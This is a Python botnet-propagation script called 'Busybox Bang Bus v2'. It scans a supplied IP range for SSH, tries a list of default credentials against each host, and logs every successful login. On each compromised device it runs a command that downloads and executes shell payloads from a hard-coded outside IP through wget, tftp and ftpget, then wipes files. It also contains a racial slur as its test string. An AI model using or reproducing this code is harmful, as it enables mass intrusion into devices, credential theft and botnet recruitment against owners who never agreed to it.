BBBv2.py

1. #!/usr/bin/env python
2. """
3. Busybox Bang Bus v2
4. LiGhT dA BoSs yA DiG! nO CoDe RiPPrInG PlZ
5. XORA IS A SKID, PROXY IS A SKID, ZONE IS A SKID, YOU ARE ALL SKIDZ!
6. """
7.  
8. import threading, paramiko, random, socket, time, os, sys
9.  
10. os.system("clear")
11. if len(sys.argv) < 3:
12. print "BuSyBoX BaNG BuS v2"
13. print "Usage: python "+sys.argv[0]+" [Start IP] [End IP] [0/1/2/perl/ubnt]"
14. sys.exit("Example: python "+sys.argv[0]+" 1.1.1.1 2.2.2.2 0\n")
15.  
16. sys.stdout.write("\x1b]2;BuSyBoX BaNG BuS\x07")
17. paramiko.util.log_to_file("/dev/null") #quiets paramiko output
18.  
19. passwords = [ # argv 0
20. "ubnt:ubnt",
21. "root:root",
22. "root:admin",
23. "admin:admin",
24. "root:1234",
25. "admin:1234",
26. "guest:guest",
27. "user:user",
28. "test:test",
29. ]
30.  
31. if sys.argv[3] == '1':
32. passwords = [ "root:root", "root:admin", "admin:admin", "ubnt:ubnt", "root:1234", "admin:1234", "guest:guest", "user:user", "test:test" ] #Slow but effective
33. if sys.argv[3] == '2':
34. passwords = [ "root:root", "admin:admin", "ubnt:ubnt" ] #faster with decent execution
35. if sys.argv[3] == 'perl':
36. passwords = [ "pi:raspberry", "vagrant:vagrant" ] #perl scanner
37. if sys.argv[3] == 'ubnt':
38. passwords = [ "ubnt:ubnt" ] #only ubnt
39.  
40. raw_input("Press <ENTER> to Enter the Bang Bus")
41. credit = '# DO NOT SHARE THIS FUCKING SHIT' #throwback lulz
42. print "\033[0m" + credit + "\033[0m"
43.  
44. def ipRange(start_ip, end_ip):
45. start = list(map(int, start_ip.split(".")))
46. end = list(map(int, end_ip.split(".")))
47. temp = start
48. ip_range = []
49.  
50. ip_range.append(start_ip)
51. while temp != end:
52. start[3] += 1
53. for i in (3, 2, 1):
54. if temp[i] == 256:
55. temp[i] = 0
56. temp[i-1] += 1
57. ip_range.append(".".join(map(str, temp)))
58.  
59. return ip_range
60. class sshscanner(threading.Thread): # TAG: 1A
61. def __init__ (self, ip):
62. threading.Thread.__init__(self)
63. self.ip = str(ip)
64. global passwords
65. def run(self):
66. x = 1
67. while x != 0:
68. try:
69. username='root'
70. password="0"
71. port = 22
72. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
73. s.settimeout(3)
74. s.connect((self.ip, port))
75. s.close()
76. ssh = paramiko.SSHClient()
77. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
78. dobreak=False
79. for passwd in passwords:
80. if ":n/a" in passwd:
81. password=""
82. else:
83. password=passwd.split(":")[1]
84. if "n/a:" in passwd:
85. username=""
86. else:
87. username=passwd.split(":")[0]
88. try:
89. ssh.connect(self.ip, port = port, username=username, password=password, timeout=5)
90. dobreak=True
91. break
92. except:
93. pass
94. if True == dobreak:
95. break
96. badserver=True
97. stdin, stdout, stderr = ssh.exec_command("echo nigger")
98. output = stdout.read()
99. if "nigger" in output:
100. badserver=False
101. if badserver == False:
102. os.system("echo -e " +self.ip+ " >> .infected.ips")
103. os.system("echo -e " +username+ ":" +password+ ":" +self.ip+ " >> infection.log")
104. print "\033[32mSlave Joining -> " +username+ ":" +password+ ":" +self.ip+ "\033[0m"
105. ssh.exec_command("cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://198.167.140.246/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 198.167.140.246 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 198.167.140.246; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 198.167.140.246 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *")
106. time.sleep(3)
107. ssh.close()
108. if badserver == True:
109. ssh.close()
110. except:
111. pass
112. x = 0
113. ip_range = ipRange("" +sys.argv[1], "" +sys.argv[2])
114. for ip in ip_range:
115. try:
116. t = sshscanner(ip)
117. t.start()
118. except:
119. pass # LiGhT yA DiG